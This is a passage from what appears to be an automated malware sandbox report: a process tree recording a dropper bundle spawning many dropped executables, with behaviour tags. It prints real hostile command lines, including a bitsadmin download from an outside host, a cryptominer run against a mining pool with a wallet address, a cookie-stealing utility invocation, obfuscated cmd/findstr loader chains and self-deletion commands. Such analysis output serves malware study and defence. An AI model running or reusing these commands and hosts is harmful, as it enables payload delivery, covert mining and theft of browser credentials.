                                                                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                                9⤵
                                                                                                  PID:7120
                                                                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6b070a890,0x7ff6b070a8a0,0x7ff6b070a8b0
                                                                                                    10⤵
                                                                                                      PID:7160
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1712,15964603912942533648,7959451434192158931,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3396 /prefetch:8
                                                                                                    9⤵
                                                                                                      PID:6780
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1712,15964603912942533648,7959451434192158931,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=160 /prefetch:8
                                                                                                      9⤵
                                                                                                        PID:4532
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1712,15964603912942533648,7959451434192158931,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5588 /prefetch:2
                                                                                                        9⤵
                                                                                                          PID:6804
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "cmd.exe" /C taskkill /F /PID 5176 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Bj4mmHX_RFiN7cfcRttus0Y_.exe"
                                                                                                        8⤵
                                                                                                          PID:5708
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill /F /PID 5176
                                                                                                            9⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:6548
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "cmd.exe" /C taskkill /F /PID 5176 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Bj4mmHX_RFiN7cfcRttus0Y_.exe"
                                                                                                          8⤵
                                                                                                            PID:4248
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /F /PID 5176
                                                                                                              9⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:6488
                                                                                                      • C:\Users\Admin\Documents\9GCCv6VSuYYt8kuG2IsXvxR3.exe
                                                                                                        "C:\Users\Admin\Documents\9GCCv6VSuYYt8kuG2IsXvxR3.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:1528
                                                                                                        • C:\Users\Admin\Documents\9GCCv6VSuYYt8kuG2IsXvxR3.exe
                                                                                                          "C:\Users\Admin\Documents\9GCCv6VSuYYt8kuG2IsXvxR3.exe"
                                                                                                          7⤵
                                                                                                            PID:5996
                                                                                                          • C:\Users\Admin\Documents\9GCCv6VSuYYt8kuG2IsXvxR3.exe
                                                                                                            "C:\Users\Admin\Documents\9GCCv6VSuYYt8kuG2IsXvxR3.exe"
                                                                                                            7⤵
                                                                                                              PID:5952
                                                                                                          • C:\Users\Admin\Documents\5qcXJArzb4xaDQlqU1GhYUid.exe
                                                                                                            "C:\Users\Admin\Documents\5qcXJArzb4xaDQlqU1GhYUid.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1288
                                                                                                            • C:\Users\Admin\Documents\5qcXJArzb4xaDQlqU1GhYUid.exe
                                                                                                              C:\Users\Admin\Documents\5qcXJArzb4xaDQlqU1GhYUid.exe
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              PID:5668
                                                                                                            • C:\Users\Admin\Documents\5qcXJArzb4xaDQlqU1GhYUid.exe
                                                                                                              C:\Users\Admin\Documents\5qcXJArzb4xaDQlqU1GhYUid.exe
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5660
                                                                                                            • C:\Users\Admin\Documents\5qcXJArzb4xaDQlqU1GhYUid.exe
                                                                                                              C:\Users\Admin\Documents\5qcXJArzb4xaDQlqU1GhYUid.exe
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5652
                                                                                                          • C:\Users\Admin\Documents\b3ajZSe2LdHhdphJpqo13evk.exe
                                                                                                            "C:\Users\Admin\Documents\b3ajZSe2LdHhdphJpqo13evk.exe"
                                                                                                            6⤵
                                                                                                              PID:504
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 656
                                                                                                                7⤵
                                                                                                                • Program crash
                                                                                                                PID:5012
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 668
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • Program crash
                                                                                                                PID:2688
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 672
                                                                                                                7⤵
                                                                                                                • Program crash
                                                                                                                PID:1936
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 680
                                                                                                                7⤵
                                                                                                                • Program crash
                                                                                                                PID:5164
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 1132
                                                                                                                7⤵
                                                                                                                • Program crash
                                                                                                                PID:5888
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 1212
                                                                                                                7⤵
                                                                                                                • Program crash
                                                                                                                PID:6056
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 1108
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Program crash
                                                                                                                PID:1936
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "b3ajZSe2LdHhdphJpqo13evk.exe" /f & erase "C:\Users\Admin\Documents\b3ajZSe2LdHhdphJpqo13evk.exe" & exit
                                                                                                                7⤵
                                                                                                                  PID:5496
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    8⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:3264
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /im "b3ajZSe2LdHhdphJpqo13evk.exe" /f
                                                                                                                    8⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    PID:5716
                                                                                                              • C:\Users\Admin\Documents\8wmllMkJVVftMKmGzQumJC6B.exe
                                                                                                                "C:\Users\Admin\Documents\8wmllMkJVVftMKmGzQumJC6B.exe"
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3400
                                                                                                                • C:\Users\Admin\Documents\8wmllMkJVVftMKmGzQumJC6B.exe
                                                                                                                  "C:\Users\Admin\Documents\8wmllMkJVVftMKmGzQumJC6B.exe"
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:5496
                                                                                                              • C:\Users\Admin\Documents\IPL0GzVZAUHAAunj__DVR7MX.exe
                                                                                                                "C:\Users\Admin\Documents\IPL0GzVZAUHAAunj__DVR7MX.exe"
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Drops file in Program Files directory
                                                                                                                PID:4368
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb8763.tmp\tempfile.ps1"
                                                                                                                  7⤵
                                                                                                                    PID:812
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb8763.tmp\tempfile.ps1"
                                                                                                                    7⤵
                                                                                                                      PID:5348
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb8763.tmp\tempfile.ps1"
                                                                                                                      7⤵
                                                                                                                        PID:5152
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb8763.tmp\tempfile.ps1"
                                                                                                                        7⤵
                                                                                                                          PID:3520
                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb8763.tmp\tempfile.ps1"
                                                                                                                          7⤵
                                                                                                                            PID:1016
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb8763.tmp\tempfile.ps1"
                                                                                                                            7⤵
                                                                                                                              PID:5776
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb8763.tmp\tempfile.ps1"
                                                                                                                              7⤵
                                                                                                                                PID:5160
                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                                                                7⤵
                                                                                                                                • Download via BitsAdmin
                                                                                                                                PID:1020
                                                                                                                            • C:\Users\Admin\Documents\QoKNrQqxJg4S32D99pEyDTDL.exe
                                                                                                                              "C:\Users\Admin\Documents\QoKNrQqxJg4S32D99pEyDTDL.exe"
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              PID:4380
                                                                                                                            • C:\Users\Admin\Documents\Rvf5AVCqFi9XN7h7zm903n6r.exe
                                                                                                                              "C:\Users\Admin\Documents\Rvf5AVCqFi9XN7h7zm903n6r.exe"
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:1012
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                7⤵
                                                                                                                                  PID:5944
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                            4⤵
                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                            PID:4040
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_6.exe
                                                                                                                              sonia_6.exe
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Adds Run key to start application
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:4336
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                6⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:1852
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                6⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:2228
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                6⤵
                                                                                                                                  PID:1780
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                  6⤵
                                                                                                                                    PID:1160
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                4⤵
                                                                                                                                  PID:4120
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 496
                                                                                                                                  4⤵
                                                                                                                                  • Program crash
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:4280
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                                                                                                  4⤵
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:3624
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                            1⤵
                                                                                                                            • Drops file in System32 directory
                                                                                                                            PID:512
                                                                                                                            • C:\Users\Admin\AppData\Roaming\wsuasvw
                                                                                                                              C:\Users\Admin\AppData\Roaming\wsuasvw
                                                                                                                              2⤵
                                                                                                                                PID:4076
                                                                                                                                • C:\Users\Admin\AppData\Roaming\wsuasvw
                                                                                                                                  C:\Users\Admin\AppData\Roaming\wsuasvw
                                                                                                                                  3⤵
                                                                                                                                    PID:6064
                                                                                                                                • C:\Users\Admin\AppData\Roaming\fhuasvw
                                                                                                                                  C:\Users\Admin\AppData\Roaming\fhuasvw
                                                                                                                                  2⤵
                                                                                                                                    PID:6672
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\wauasvw
                                                                                                                                    C:\Users\Admin\AppData\Roaming\wauasvw
                                                                                                                                    2⤵
                                                                                                                                      PID:6704
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\fhuasvw
                                                                                                                                      C:\Users\Admin\AppData\Roaming\fhuasvw
                                                                                                                                      2⤵
                                                                                                                                        PID:1996
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\wauasvw
                                                                                                                                        C:\Users\Admin\AppData\Roaming\wauasvw
                                                                                                                                        2⤵
                                                                                                                                          PID:5096
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\wsuasvw
                                                                                                                                          C:\Users\Admin\AppData\Roaming\wsuasvw
                                                                                                                                          2⤵
                                                                                                                                            PID:4380
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\wsuasvw
                                                                                                                                              C:\Users\Admin\AppData\Roaming\wsuasvw
                                                                                                                                              3⤵
                                                                                                                                                PID:6220
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\wauasvw
                                                                                                                                              C:\Users\Admin\AppData\Roaming\wauasvw
                                                                                                                                              2⤵
                                                                                                                                                PID:4124
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\wsuasvw
                                                                                                                                                C:\Users\Admin\AppData\Roaming\wsuasvw
                                                                                                                                                2⤵
                                                                                                                                                  PID:6308
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\fhuasvw
                                                                                                                                                  C:\Users\Admin\AppData\Roaming\fhuasvw
                                                                                                                                                  2⤵
                                                                                                                                                    PID:6692
                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:4580
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                    2⤵
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    PID:2740
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                    2⤵
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    PID:4072
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_1.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_1.exe" -a
                                                                                                                                                  1⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:424
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_1.exe
                                                                                                                                                  sonia_1.exe
                                                                                                                                                  1⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:1800
                                                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                  1⤵
                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:2072
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                    2⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:2272
                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                  1⤵
                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                  PID:6100
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                    2⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    PID:6116
                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                  PID:5500
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2FE6.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\2FE6.exe
                                                                                                                                                  1⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:5396
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2FE6.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\2FE6.exe"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:5344
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2FE6.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\2FE6.exe"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1628
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2FE6.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\2FE6.exe"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:5596
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2FE6.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\2FE6.exe"
                                                                                                                                                          2⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:5292
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2FE6.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\2FE6.exe"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:5544
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\C476.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\C476.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2156
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\C476.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\C476.exe
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2228
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49ciCfWrkhQWz6LYXux4LV1P5eAFMfox1H2y3k6VSn7Jb39nDYDUiC6JFCUBDDf63GQqpKc5ZQQ8vCHwgzesAKHtJwB9o2i -p x -k -v=0 --donate-level=1 -t 1
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4828
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\D223.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\D223.exe
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:3520
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\D6F6.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\D6F6.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:4628
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\D6F6.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\D6F6.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:4404
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DCD3.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\DCD3.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:3772
                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                          cmd /c start c.exe & start l.exe
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4492
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c.exe
                                                                                                                                                                              c.exe
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:5764
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c cmd < Parlasse.wmv
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:6020
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      cmd
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:5416
                                                                                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                          findstr /V /R "^hqVLSBiFVkisDvgANWfHkkgqnFPqUPdvHQlUgqiIGEuNwqJAbhcZzXvwMVhhLiKuVLKNjzkNOHwGyBYbVfCGzdrKzoozMTXmTqRddWgreIkLVQWlWPacEtMEHZxtk$" Ove.wmv
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:4460
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                            Puramente.exe.com m
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:5532
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:5040
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:5104
                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                  ping RJMQBVDN -n 30
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                  PID:5804
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\l.exe
                                                                                                                                                                                            l.exe
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5860
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\F500.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\F500.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:5628
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\FAFC.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\FAFC.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:5368
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im FAFC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\FAFC.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4792
                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                    taskkill /im FAFC.exe /f
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                    PID:3928
                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                    PID:2728
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2AE.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\2AE.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:1596
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\12BC.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\12BC.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:5248
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\12BC.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\12BC.exe
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4728
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\187A.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\187A.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:4432
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\187A.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\187A.exe
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:6116
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3B45.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\3B45.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:192
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\42E7.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\42E7.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:3164
